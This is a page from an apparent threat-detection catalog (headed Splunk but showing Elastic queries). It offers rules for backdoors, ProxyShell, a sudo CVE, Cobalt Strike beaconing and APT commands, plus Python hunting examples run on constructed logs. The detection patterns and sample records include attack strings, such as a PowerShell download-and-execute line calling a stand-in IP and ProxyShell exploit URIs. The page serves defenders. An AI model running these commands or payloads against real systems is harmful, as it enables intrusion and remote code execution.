Tool
Splunk
12,781 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK
Detections
50 shown of 12,781
Sticky Key Like Backdoor Usage - Registry
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Show query
any where TargetObject like~ ("*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger")
Sticky Key Like Backdoor Usage - Registry
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Show query
from * metadata _id, _index, _version | where ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger")
Sticky Key Like Backdoor Usage - Registry
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Show query
TargetObject:(*\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\sethc.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\utilman.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\osk.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\Magnify.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\Narrator.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\DisplaySwitch.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\atbroker.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\HelpPane.exe\\Debugger)
Elastic
Converted
EQL
critical
Successful Exchange ProxyShell Attack
Detects URI patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
Show query
any where `cs-uri-query`:"*/autodiscover.json*" and (`cs-uri-query` like~ ("*/powershell*", "*/mapi/nspi*", "*/EWS*", "*X-Rps-CAT*")) and `sc-status` in (200, 301)
Elastic
Converted
ES|QL
critical
Successful Exchange ProxyShell Attack
Detects URI patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
Show query
from * metadata _id, _index, _version | where `cs-uri-query` like "*/autodiscover.json*" and (`cs-uri-query` like "*/powershell*" or `cs-uri-query` like "*/mapi/nspi*" or `cs-uri-query` like "*/EWS*" or `cs-uri-query` like "*X-Rps-CAT*") and (`sc-status` in (200, 301))
Elastic
Converted
Lucene
critical
Successful Exchange ProxyShell Attack
Detects URI patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
Show query
cs-uri-query:*\/autodiscover.json* AND (cs-uri-query:(*\/powershell* OR *\/mapi\/nspi* OR *\/EWS* OR *X\-Rps\-CAT*)) AND (sc-status:(200 OR 301))
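The rule reads the `cs-uri-query` and `sc-status` columns of IIS W3C logs, so the usual place it breaks is in the log parsing rather than in the match itself. The following added example (mine, not the catalog's or Sigma's code) parses a constructed W3C excerpt using its `#Fields:` header and applies the rule's three conditions to each record. The sample request lines, hosts and documentation-range IP addresses are constructed, not captured traffic.

```python
# Added example, not the catalog's or Sigma's own code: parse W3C-format IIS logs and
# apply the "Successful Exchange ProxyShell Attack" logic to each record.
import fnmatch

# Constructed IIS W3C excerpt; the query strings are illustrative, not captured traffic.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2021-08-12 10:00:01 10.0.0.5 POST /autodiscover/autodiscover.json a=x@x.com/powershell?X-Rps-CAT=abc&Email=autodiscover/autodiscover.json%3Fa%3Dx@x.com 443 - 203.0.113.9 200
2021-08-12 10:00:02 10.0.0.5 GET /autodiscover/autodiscover.json @foo.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@foo.com 443 - 203.0.113.9 500
2021-08-12 10:00:03 10.0.0.5 GET /owa/ - 443 alice 198.51.100.7 200
2021-08-12 10:00:04 10.0.0.5 POST /autodiscover/autodiscover.json a=x@x.com/EWS/exchange.asmx?&Email=autodiscover/autodiscover.json%3Fa%3Dx@x.com 443 - 203.0.113.9 301
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the column names in the #Fields header.
    IIS writes fields space-separated and encodes spaces inside values as '+'."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            yield dict(zip(fields, line.split()))


def _like(value, patterns):
    """Case-insensitive wildcard match, the semantics of EQL `like~`."""
    v = value.lower()
    return any(fnmatch.fnmatchcase(v, p.lower()) for p in patterns)


def is_successful_proxyshell(rec):
    """The rule's three conditions: autodiscover.json in the query, a backend
    path or the X-Rps-CAT token in the query, and a 200/301 response."""
    q = rec.get("cs-uri-query", "-")
    return (_like(q, ["*/autodiscover.json*"])
            and _like(q, ["*/powershell*", "*/mapi/nspi*", "*/EWS*", "*X-Rps-CAT*"])
            and rec.get("sc-status") in ("200", "301"))


def hunt(text):
    """Return (client IP, URI stem, status) for each record the rule fires on."""
    return [(r["c-ip"], r["cs-uri-stem"], r["sc-status"])
            for r in parse_w3c(text) if is_successful_proxyshell(r)]


if __name__ == "__main__":
    for ip, stem, status in hunt(SAMPLE_IIS_LOG):
        print(f"ALERT {ip} {stem} -> {status}")
```

The second sample line carries the same request shape but a 500 response and is deliberately not flagged: the rule is gated on a success status so that patched or failing servers do not alert. Pair it with a rule that does not gate on status if you also want early visibility of attempts.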
Sudo Privilege Escalation CVE-2019-14287 - Builtin
Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
Show query
any where USER like~ ("#-*", "#*4294967295")
Sudo Privilege Escalation CVE-2019-14287 - Builtin
Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
Show query
from * metadata _id, _index, _version | where starts_with(USER, "#-") or USER like "#*4294967295"
Sudo Privilege Escalation CVE-2019-14287 - Builtin
Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
Show query
USER:(#\-* OR #*4294967295)
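The two wildcard patterns are wider than the bug: CVE-2019-14287 is triggered specifically by `-u#-1` or `-u#4294967295`, both of which pre-1.8.28 sudo mapped to uid 0, while `#-*` also matches any other negative uid. The added example below (mine, not the catalog's or Sigma's code) parses constructed sudo syslog lines, applies the rule's patterns as written, and adds a tighter check for the exact exploit values so an analyst can tell the two apart. Log lines, hostnames and user names are constructed.

```python
# Added example, not from the catalog or Sigma: the CVE-2019-14287 patterns applied to
# constructed sudo auth.log lines, plus a tighter check for the exact exploit values.
import re

# Standard sudo syslog layout: "sudo: <invoker> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<cmd>"
SUDO_LINE = re.compile(
    r"sudo:\s+(?P<invoker>\S+)\s*:.*?;\s*USER=(?P<user>\S+)\s*;\s*COMMAND=(?P<cmd>.*)$"
)

# Constructed sample lines (not real logs).
SAMPLE_AUTH_LOG = [
    "Oct 15 10:01:02 host sudo:    bob : TTY=pts/0 ; PWD=/home/bob ; USER=#-1 ; COMMAND=/bin/bash",
    "Oct 15 10:01:10 host sudo:    bob : TTY=pts/0 ; PWD=/home/bob ; USER=#4294967295 ; COMMAND=/usr/bin/id",
    "Oct 15 10:02:00 host sudo:  alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update",
    "Oct 15 10:02:30 host sudo:  alice : TTY=pts/1 ; PWD=/home/alice ; USER=#1001 ; COMMAND=/usr/bin/id",
    "Oct 15 10:03:00 host sshd[123]: Accepted publickey for alice from 10.0.0.2 port 5555",
]


def user_matches_rule(user):
    """The catalog rule's patterns: '#-*' (any negative numeric uid) or '#*4294967295'."""
    return user.startswith("#-") or (user.startswith("#") and user.endswith("4294967295"))


def is_uid_wraparound(user):
    """Tighter check for the actual CVE-2019-14287 trigger: a uid spelled as -1 or as
    2**32-1, which vulnerable sudo passed to setresuid() and which resolved to root."""
    if not user.startswith("#"):
        return False
    try:
        uid = int(user[1:])
    except ValueError:
        return False
    return uid == -1 or uid == 0xFFFFFFFF


def hunt(lines):
    """Return (invoker, target user, command, exact_exploit_value) per matching line."""
    hits = []
    for line in lines:
        m = SUDO_LINE.search(line)
        if m and user_matches_rule(m["user"]):
            hits.append((m["invoker"], m["user"], m["cmd"], is_uid_wraparound(m["user"])))
    return hits


if __name__ == "__main__":
    for invoker, user, cmd, exact in hunt(SAMPLE_AUTH_LOG):
        print(f"ALERT {invoker} ran {cmd!r} as {user} (exact CVE value: {exact})")
```

A `USER=#-100` line would satisfy the rule but not the tighter check; on a patched sudo it simply fails, so the rule still has value as an indicator that someone is probing the uid parsing.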
Elastic
Converted
EQL
critical
Suspicious Child Process Of Veeam Database
Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Show query
any where (ParentImage:"*\\sqlservr.exe" and ParentCommandLine:"*VEEAMSQL*") and (((Image like~ ("*\\cmd.exe", "*\\powershell.exe", "*\\pwsh.exe", "*\\wsl.exe", "*\\wt.exe")) and (CommandLine like~ ("*-ex *", "*bypass*", "*cscript*", "*DownloadString*", "*http://*", "*https://*", "*mshta*", "*regsvr32*", "*rundll32*", "*wscript*", "*copy *"))) or (Image like~ ("*\\net.exe", "*\\net1.exe", "*\\netstat.exe", "*\\nltest.exe", "*\\ping.exe", "*\\tasklist.exe", "*\\whoami.exe")))
Elastic
Converted
ES|QL
critical
Suspicious Child Process Of Veeam Database
Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Show query
from * metadata _id, _index, _version | where ends_with(ParentImage, "\\sqlservr.exe") and ParentCommandLine like "*VEEAMSQL*" and ((ends_with(Image, "\\cmd.exe") or ends_with(Image, "\\powershell.exe") or ends_with(Image, "\\pwsh.exe") or ends_with(Image, "\\wsl.exe") or ends_with(Image, "\\wt.exe")) and (CommandLine like "*-ex *" or CommandLine like "*bypass*" or CommandLine like "*cscript*" or CommandLine like "*DownloadString*" or CommandLine like "*http://*" or CommandLine like "*https://*" or CommandLine like "*mshta*" or CommandLine like "*regsvr32*" or CommandLine like "*rundll32*" or CommandLine like "*wscript*" or CommandLine like "*copy *") or ends_with(Image, "\\net.exe") or ends_with(Image, "\\net1.exe") or ends_with(Image, "\\netstat.exe") or ends_with(Image, "\\nltest.exe") or ends_with(Image, "\\ping.exe") or ends_with(Image, "\\tasklist.exe") or ends_with(Image, "\\whoami.exe"))
Elastic
Converted
Lucene
critical
Suspicious Child Process Of Veeam Database
Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Show query
(ParentImage:*\\sqlservr.exe AND ParentCommandLine:*VEEAMSQL*) AND (((Image:(*\\cmd.exe OR *\\powershell.exe OR *\\pwsh.exe OR *\\wsl.exe OR *\\wt.exe)) AND (CommandLine:(*\-ex\ * OR *bypass* OR *cscript* OR *DownloadString* OR *http\:\/\/* OR *https\:\/\/* OR *mshta* OR *regsvr32* OR *rundll32* OR *wscript* OR *copy\ *))) OR (Image:(*\\net.exe OR *\\net1.exe OR *\\netstat.exe OR *\\nltest.exe OR *\\ping.exe OR *\\tasklist.exe OR *\\whoami.exe)))
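The rule has two branches under one parent condition: a shell spawned with download/bypass-style arguments, or any of a short list of reconnaissance tools regardless of arguments. The ES|QL conversion above relies on `and` binding tighter than `or` to keep that structure, which is easy to get wrong when editing by hand. The added example below (mine, not the catalog's or Sigma's code) writes the two branches out explicitly and runs them over constructed Sysmon Event ID 1 records; the instance names, paths and command lines are constructed.

```python
# Added example, not from the catalog or Sigma: the "Suspicious Child Process Of Veeam
# Database" logic on constructed process-creation records, branches written explicitly.
import fnmatch

SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\wsl.exe", "\\wt.exe")
SHELL_ARGS = ("*-ex *", "*bypass*", "*cscript*", "*DownloadString*", "*http://*",
              "*https://*", "*mshta*", "*regsvr32*", "*rundll32*", "*wscript*", "*copy *")
RECON_TOOLS = ("\\net.exe", "\\net1.exe", "\\netstat.exe", "\\nltest.exe", "\\ping.exe",
               "\\tasklist.exe", "\\whoami.exe")


def _ends_with_any(value, suffixes):
    """Case-insensitive suffix match (EQL `like~ "*\\x.exe"` / ES|QL ends_with)."""
    return value.lower().endswith(tuple(s.lower() for s in suffixes))


def _like_any(value, patterns):
    """Case-insensitive wildcard match (EQL `like~`)."""
    v = value.lower()
    return any(fnmatch.fnmatchcase(v, p.lower()) for p in patterns)


def is_suspicious_veeam_child(ev):
    parent_is_veeam_sql = (_ends_with_any(ev.get("ParentImage", ""), ("\\sqlservr.exe",))
                           and "veeamsql" in ev.get("ParentCommandLine", "").lower())
    if not parent_is_veeam_sql:
        return False
    image, cmdline = ev.get("Image", ""), ev.get("CommandLine", "")
    shell_with_bad_args = _ends_with_any(image, SHELLS) and _like_any(cmdline, SHELL_ARGS)
    recon_tool = _ends_with_any(image, RECON_TOOLS)   # no argument check on this branch
    return shell_with_bad_args or recon_tool


# Constructed sample records (instance names and paths are illustrative).
VEEAM_SQLSERVR = "C:\\Program Files\\Microsoft SQL Server\\MSSQL13.VEEAMSQL2016\\MSSQL\\Binn\\sqlservr.exe"
VEEAM_CMDLINE = f"\"{VEEAM_SQLSERVR}\" -sVEEAMSQL2016"
OTHER_SQLSERVR = "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe"
OTHER_CMDLINE = f"\"{OTHER_SQLSERVR}\" -sMSSQLSERVER"

SAMPLE_EVENTS = [
    {"ParentImage": VEEAM_SQLSERVR, "ParentCommandLine": VEEAM_CMDLINE,
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -ex bypass -nop -w hidden -c "
                    "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')\""},
    {"ParentImage": VEEAM_SQLSERVR, "ParentCommandLine": VEEAM_CMDLINE,
     "Image": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami /all"},
    {"ParentImage": VEEAM_SQLSERVR, "ParentCommandLine": VEEAM_CMDLINE,   # shell, benign-looking args
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c echo hello"},
    {"ParentImage": OTHER_SQLSERVR, "ParentCommandLine": OTHER_CMDLINE,   # not the Veeam instance
     "Image": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami /all"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_suspicious_veeam_child(ev), ev["CommandLine"])
```

The third record shows the rule's blind spot: a shell child of the Veeam SQL instance with arguments that match none of the listed strings is not flagged. Any child process of `sqlservr.exe` is unusual enough that a broader rule on that parent alone is worth running at a lower severity.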
Suspicious Cobalt Strike DNS Beaconing - DNS Client
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
any where EventID:3008 and ((QueryName like~ ("aaa.stage.*", "post.1*")) or QueryName:"*.stage.123456.*")
Suspicious Cobalt Strike DNS Beaconing - DNS Client
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
from * metadata _id, _index, _version | where EventID==3008 and (starts_with(QueryName, "aaa.stage.") or starts_with(QueryName, "post.1") or QueryName like "*.stage.123456.*")
Suspicious Cobalt Strike DNS Beaconing - DNS Client
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
EventID:3008 AND ((QueryName:(aaa.stage.* OR post.1*)) OR QueryName:*.stage.123456.*)
Suspicious Cobalt Strike DNS Beaconing - Sysmon
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
any where (QueryName like~ ("aaa.stage.*", "post.1*")) or QueryName:"*.stage.123456.*"
Suspicious Cobalt Strike DNS Beaconing - Sysmon
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
from * metadata _id, _index, _version | where starts_with(QueryName, "aaa.stage.") or starts_with(QueryName, "post.1") or QueryName like "*.stage.123456.*"
Suspicious Cobalt Strike DNS Beaconing - Sysmon
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
(QueryName:(aaa.stage.* OR post.1*)) OR QueryName:*.stage.123456.*
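The DNS Client (Event ID 3008) and Sysmon (Event ID 22) variants above share the same three query-name patterns and differ only in the event source. The added example below (mine, not the catalog's or Sigma's code) applies those patterns to constructed records of both kinds and groups hits by the issuing process where Sysmon provides one, since the process that made the lookups is what decides whether a `post.1*` hit is worth escalating. Query names, process paths and the `hunt` helper are constructed.

```python
# Added example, not from the catalog or Sigma: the Cobalt Strike DNS beacon query-name
# patterns applied to constructed DNS Client (3008) and Sysmon (22) records.
import fnmatch

BEACON_PATTERNS = ("aaa.stage.*", "post.1*", "*.stage.123456.*")


def matches_cs_dns_pattern(qname):
    """Case-insensitive wildcard match of a query name against the rule's patterns."""
    q = qname.lower()
    return any(fnmatch.fnmatchcase(q, p) for p in BEACON_PATTERNS)


def hunt(events):
    """Return {issuing process: [matching query names]}. Sysmon Event ID 22 carries
    Image; DNS Client 3008 records do not, so those group under '<unknown>'."""
    by_image = {}
    for e in events:
        if matches_cs_dns_pattern(e["QueryName"]):
            by_image.setdefault(e.get("Image", "<unknown>"), []).append(e["QueryName"])
    return by_image


# Constructed sample records (not captured telemetry).
SAMPLE_DNS_EVENTS = [
    {"EventID": 22, "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe",
     "QueryName": "aaa.stage.1234.c2.example"},
    {"EventID": 22, "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe",
     "QueryName": "post.140.a2b3.c2.example"},
    {"EventID": 22, "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe",
     "QueryName": "api.stage.123456.c2.example"},
    {"EventID": 22, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "QueryName": "www.stage.example"},                # "stage" label alone is not enough
    {"EventID": 22, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "QueryName": "post.10.example"},                  # any name starting "post.1" satisfies "post.1*"
    {"EventID": 3008, "QueryName": "aaa.stage.9.c2.example"},   # DNS Client record, no Image
]

if __name__ == "__main__":
    for image, names in hunt(SAMPLE_DNS_EVENTS).items():
        print(image, names)
```

The `post.1*` pattern is a plain prefix and fires on any hostname that begins with those six characters, as the fifth record shows, so volume and the issuing process matter before escalating a single hit.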
Elastic
Converted
EQL
critical
Suspicious PowerShell Mailbox Export to Share
Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation
Show query
any where CommandLine:"*New-MailboxExportRequest*" and CommandLine:"* -Mailbox *" and CommandLine:"* -FilePath \\\\*"
Elastic
Converted
ES|QL
critical
Suspicious PowerShell Mailbox Export to Share
Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation
Show query
from * metadata _id, _index, _version | where CommandLine like "*New-MailboxExportRequest*" and CommandLine like "* -Mailbox *" and CommandLine like "* -FilePath \\\\*"
Elastic
Converted
Lucene
critical
Suspicious PowerShell Mailbox Export to Share
Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation
Show query
CommandLine:*New\-MailboxExportRequest* AND CommandLine:*\ \-Mailbox\ * AND CommandLine:*\ \-FilePath\ \\\\*
Elastic
Converted
EQL
critical
Suspicious PowerShell Mailbox Export to Share - PS
Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation
Show query
any where ScriptBlockText:"*New-MailboxExportRequest*" and ScriptBlockText:"* -Mailbox *" and ScriptBlockText:"* -FilePath \\\\*"
Elastic
Converted
ES|QL
critical
Suspicious PowerShell Mailbox Export to Share - PS
Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation
Show query
from * metadata _id, _index, _version | where ScriptBlockText like "*New-MailboxExportRequest*" and ScriptBlockText like "* -Mailbox *" and ScriptBlockText like "* -FilePath \\\\*"
Elastic
Converted
Lucene
critical
Suspicious PowerShell Mailbox Export to Share - PS
Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation
Show query
ScriptBlockText:*New\-MailboxExportRequest* AND ScriptBlockText:*\ \-Mailbox\ * AND ScriptBlockText:*\ \-FilePath\ \\\\*
Telnet Authentication Bypass via User Environment Variable
Identifies potential exploitation of a Telnet remote authentication bypass vulnerability (CVE-2026-24061) in GNU Inetutils telnetd. The vulnerability allows unauthenticated access by supplying a crafted `-f <username>` value via the `USER` environment variable, resulting in a login process spawned with elevated privileges.
Elastic
Original
KQL
critical
Threat Intel Filebeat Module (v7.x) Indicator Match
This rule is triggered when indicators from the Threat Intel Filebeat module (v7.x) have a match against local file or network observations.
TrustedPath UAC Bypass Pattern
Detects indicators of a UAC bypass method by mocking directories
Show query
any where Image like~ ("*C:\\Windows \\System32\\*", "*C:\\Windows \\SysWOW64\\*")
TrustedPath UAC Bypass Pattern
Detects indicators of a UAC bypass method by mocking directories
Show query
from * metadata _id, _index, _version | where Image like "*C:\\Windows \\System32\\*" or Image like "*C:\\Windows \\SysWOW64\\*"
TrustedPath UAC Bypass Pattern
Detects indicators of a UAC bypass method by mocking directories
Show query
Image:(*C\:\\Windows\ \\System32\\* OR *C\:\\Windows\ \\SysWOW64\\*)
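The whole bypass rests on one character: the space after `Windows` in `C:\Windows \System32\`. Win32 path normalisation strips trailing spaces from path components, so the mock directory cannot be created through the normal shell API and a legitimately installed binary should never run from such a path. The added example below (mine, not the catalog's or Sigma's code) checks constructed image paths against the rule as written and, as my own generalisation beyond the rule, against any directory component that ends in a space. The file names and paths are constructed.

```python
# Added example, not from the catalog or Sigma: the TrustedPath mock-directory check on
# constructed image paths, plus a generalisation to any trailing-space directory.

# The two directories the catalog rule looks for, compared case-insensitively.
MOCK_DIRS = ("c:\\windows \\system32\\", "c:\\windows \\syswow64\\")


def matches_catalog_rule(image):
    """The rule as written: the image path contains one of the two mock directories."""
    return any(d in image.lower() for d in MOCK_DIRS)


def has_trailing_space_dir(image):
    """Generalisation (mine, not the rule's): any directory component ending in a space.
    Normal Win32 path handling strips such spaces, so these directories are only
    created deliberately, e.g. through a \\\\?\\-prefixed path."""
    components = image.split("\\")[:-1]   # drop the file name, keep directories
    return any(c.endswith(" ") for c in components)


def classify(images):
    """Return {path: (rule_hit, generalised_hit)} for each image path."""
    return {img: (matches_catalog_rule(img), has_trailing_space_dir(img)) for img in images}


# Constructed sample paths (not captured telemetry).
SAMPLE_IMAGES = [
    "C:\\Windows \\System32\\winSAT.exe",       # mock trusted directory
    "C:\\Windows\\System32\\winSAT.exe",        # the real location
    "C:\\Program Files \\Vendor\\update.exe",   # same trick, a directory the rule does not list
    "C:\\Users\\bob\\My Documents\\notes.exe",  # internal space only: not a mock directory
]

if __name__ == "__main__":
    for path, (rule_hit, general_hit) in classify(SAMPLE_IMAGES).items():
        print(f"rule={rule_hit!s:5} trailing-space={general_hit!s:5} {path}")
```

Because the directory has to be created before anything runs from it, a file-creation rule on the same trailing-space pattern catches the staging step as well as the execution step the catalog rule covers.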
Turla Group Commands May 2020
Detects commands used by Turla group as reported by ESET in May 2020
Show query
any where (CommandLine like~ ("*tracert -h 10 yahoo.com*", "*.WSqmCons))|iex;*", "*Fr`omBa`se6`4Str`ing*")) or (CommandLine regex~ """.*net +use +https://docs\.live\.net.*""" and CommandLine:"*@aol.co.uk*")
Turla Group Commands May 2020
Detects commands used by Turla group as reported by ESET in May 2020
Show query
from * metadata _id, _index, _version | where CommandLine like "*tracert -h 10 yahoo.com*" or CommandLine like "*.WSqmCons))|iex;*" or CommandLine like "*Fr`omBa`se6`4Str`ing*" or (CommandLine rlike """.*net +use +https://docs\.live\.net.*""" and CommandLine like "*@aol.co.uk*")
Turla Group Commands May 2020
Detects commands used by Turla group as reported by ESET in May 2020
Show query
(CommandLine:(*tracert\ \-h\ 10\ yahoo.com* OR *.WSqmCons\)\)\|iex;* OR *Fr`omBa`se6`4Str`ing*)) OR (CommandLine:/.*net +use +https:\/\/docs\.live\.net.*/ AND CommandLine:*@aol.co.uk*)
Turla Group Lateral Movement
Detects automated lateral movement by Turla group
Show query
any where CommandLine like~ ("net use \\\\%DomainController%\\C$ \"P@ssw0rd\" *", "dir c:\\*.doc* /s", "dir %TEMP%\\*.exe")
Turla Group Lateral Movement
Detects automated lateral movement by Turla group
Show query
from * metadata _id, _index, _version | where starts_with(CommandLine, "net use \\\\%DomainController%\\C$ \"P@ssw0rd\" ") or CommandLine like "dir c:\\*.doc* /s" or CommandLine like "dir %TEMP%\\*.exe"
Turla Group Lateral Movement
Detects automated lateral movement by Turla group
Show query
CommandLine:(net\ use\ \\\\%DomainController%\\C$\ \"P@ssw0rd\"\ * OR dir\ c\:\\*.doc*\ \/s OR dir\ %TEMP%\\*.exe)
Turla Group Named Pipes
Detects a named pipe used by Turla group samples
Show query
any where PipeName like~ ("\\atctl", "\\comnap", "\\iehelper", "\\sdlrpc", "\\userpipe")
Turla Group Named Pipes
Detects a named pipe used by Turla group samples
Show query
from * metadata _id, _index, _version | where PipeName in ("\\atctl", "\\comnap", "\\iehelper", "\\sdlrpc", "\\userpipe")
Turla Group Named Pipes
Detects a named pipe used by Turla group samples
Show query
PipeName:(\\atctl OR \\comnap OR \\iehelper OR \\sdlrpc OR \\userpipe)
Turla PNG Dropper Service
This method detects malicious services mentioned in the Turla PNG dropper report published by NCC Group in November 2018
Show query
any where Provider_Name:"Service Control Manager" and EventID:7045 and ServiceName:"WerFaultSvc"
Turla PNG Dropper Service
This method detects malicious services mentioned in the Turla PNG dropper report published by NCC Group in November 2018
Show query
from * metadata _id, _index, _version | where Provider_Name=="Service Control Manager" and EventID==7045 and ServiceName=="WerFaultSvc"
Turla PNG Dropper Service
This method detects malicious services mentioned in the Turla PNG dropper report published by NCC Group in November 2018
Show query
Provider_Name:Service\ Control\ Manager AND EventID:7045 AND ServiceName:WerFaultSvc
UNC2452 PowerShell Pattern
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
Show query
any where (CommandLine:"*Invoke-WMIMethod win32_process -name create -argumentlist*" and CommandLine:"*rundll32 c:\\windows*") or (CommandLine:"*wmic /node:*" and CommandLine:"*process call create \"rundll32 c:\\windows*")
UNC2452 PowerShell Pattern
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
Show query
from * metadata _id, _index, _version | where CommandLine like "*Invoke-WMIMethod win32_process -name create -argumentlist*" and CommandLine like "*rundll32 c:\\windows*" or CommandLine like "*wmic /node:*" and CommandLine like "*process call create \"rundll32 c:\\windows*"
UNC2452 PowerShell Pattern
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
Show query
(CommandLine:*Invoke\-WMIMethod\ win32_process\ \-name\ create\ \-argumentlist* AND CommandLine:*rundll32\ c\:\\windows*) OR (CommandLine:*wmic\ \/node\:* AND CommandLine:*process\ call\ create\ \"rundll32\ c\:\\windows*)
Elastic
Converted
EQL
critical
UNC4841 - Potential SEASPY Execution
Detects execution of specifically named binaries which were used by UNC4841 to deploy their SEASPY backdoor
Show query
any where Image like~ ("*/BarracudaMailService", "*/resize2fstab", "*/resize_reisertab")
Elastic
Converted
ES|QL
critical
UNC4841 - Potential SEASPY Execution
Detects execution of specifically named binaries which were used by UNC4841 to deploy their SEASPY backdoor
Show query
from * metadata _id, _index, _version | where ends_with(Image, "/BarracudaMailService") or ends_with(Image, "/resize2fstab") or ends_with(Image, "/resize_reisertab")
Elastic
Converted
Lucene
